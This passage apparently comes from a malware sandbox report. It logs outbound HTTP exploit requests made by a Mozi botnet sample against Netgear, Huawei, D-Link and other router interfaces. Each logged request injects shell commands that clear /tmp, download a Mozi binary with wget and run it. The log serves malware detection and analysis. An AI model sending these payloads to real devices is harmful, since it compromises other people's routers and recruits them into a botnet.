                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 171.80.249.252:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 183.10.226.229:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 81.139.38.234:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 216.234.214.243:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 75.150.132.183:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 106.200.247.40:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 190.79.230.37:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 103.127.156.92:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 